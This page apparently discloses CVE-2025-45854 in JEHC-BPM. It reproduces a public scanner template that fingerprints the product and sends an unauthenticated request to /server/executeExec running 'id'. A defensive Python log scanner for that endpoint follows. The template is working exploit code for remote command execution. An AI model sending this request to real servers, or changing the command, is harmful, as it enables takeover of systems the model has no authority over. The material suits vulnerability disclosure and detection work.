A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
PoC code [public]
id: CVE-2025-45854

info:
  name: JEHC-BPM - Remote Code Execute
  author: ritikchaddha
  severity: critical
  description: |
    A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
  reference:
    - https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
    - https://nvd.nist.gov/vuln/detail/CVE-2025-45854
  classification:
    epss-score: 0.15797
    epss-percentile: 0.94485
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-45854
    cwe-id: CWE-862,CWE-434
  metadata:
    max-request: 1
    product: jehc-bpm
    fofa-query: body="JEHC"
  tags: cve,cve2025,jehc-bpm,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "JEHC"
          - "XSHI"
        case-insensitive: true
        internal: true

  - raw:
      - |
        POST /server/executeExec HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {
          "actuator": {
            "clientIp": "127.0.0.1",
            "port": 8082,
            "applicationName": "testApp",
            "env": "prod",
            "uploadTime": 1704523200000,
            "hasPrefixApplicationName": false,
            "clientHttpPrefix": "http"
          },
          "execParams": {
            "command": "id"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 490a004630440220732c3d4b51952877c225c42b2ec2860e5cf2e00dccaa6581e65c96bcefad0cb60220328c4f3351d18e3393bfbdc4ead09c8ba49d61de62b2ebd2b3ebff9b23df1a00:922c64590222798bb761d5b6d8e72950
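A defender-side check for the request described above, added here as an example that is not part of the original page or of the JEHC-BPM project: it scans web access logs for requests to /server/executeExec and normalizes encoded or padded spellings of the path before matching. The log lines are constructed; the combined log format, the `allowed_ips` allow-list and matching under a context path are assumptions.

```python
import re
from urllib.parse import unquote

# Common/combined access-log prefix: ip - - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
ENDPOINT = "/server/executeexec"  # path named in the advisory, lower-cased

def normalize_path(target):
    """Canonicalize a request target so obfuscated spellings compare equal."""
    path = re.sub(r"^https?://[^/]+", "", target, flags=re.I)  # absolute-form target
    path = path.split("?", 1)[0]  # drop the query string
    for _ in range(3):  # bounded loop unwraps double encoding such as %2565
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # drop servlet path parameters (;jsessionid=...)
        if seg == ".." and out:
            out.pop()
        elif seg not in ("", ".", ".."):
            out.append(seg)
    return "/" + "/".join(out).lower()

def find_hits(lines, allowed_ips=frozenset()):
    # Returns (ip, time, method, status, verdict) for each request to the endpoint.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        # endswith() also covers deployments under a context path (assumption).
        if not m or not normalize_path(m["target"]).endswith(ENDPOINT):
            continue
        if m["ip"] in allowed_ips:  # hypothetical list of expected callers
            continue
        status = int(m["status"])
        # The template on this page requires HTTP 200, so 200 gets reviewed first.
        verdict = "investigate" if status == 200 else "probe"
        hits.append((m["ip"], m["time"], m["method"], status, verdict))
    return hits

SAMPLE_LOG = [  # constructed lines, documentation address ranges
    '203.0.113.7 - - [12/May/2025:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [12/May/2025:10:01:03 +0000] "POST /server/executeExec HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.9 - - [12/May/2025:10:05:40 +0000] "POST /jehc//server/%65xecuteExec;x=1?a=b HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.10 - - [12/May/2025:10:06:00 +0000] "POST /server/executeExec HTTP/1.1" 200 87 "-" "-"',
]
print(find_hits(SAMPLE_LOG, allowed_ips={"192.0.2.10"}))
```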